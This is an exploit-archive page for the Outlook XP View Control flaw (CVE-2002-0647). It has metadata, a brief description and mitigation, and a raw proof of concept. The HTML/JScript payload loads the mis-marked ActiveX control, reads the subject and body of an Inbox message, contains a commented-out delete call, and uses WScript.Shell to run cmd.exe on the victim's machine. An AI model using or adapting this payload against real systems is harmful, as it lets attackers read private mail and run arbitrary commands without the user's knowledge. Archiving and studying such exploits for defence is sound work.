header-logo
Suggest Exploit
vendor:
Outlook
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary Command Execution
94
CWE
Product Name: Outlook
Affected Version From: Outlook XP
Affected Version To: Outlook XP
Patch Exists: Yes
Related CWE: CVE-2002-0647
CPE: microsoft:outlook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Outlook View Control Arbitrary Command Execution Vulnerability

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts. Scripts can execute commands without user knowledge or consent.

Mitigation:

Disable ActiveX controls in Outlook or use an alternative email client.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3026/info

Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can execute commands without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>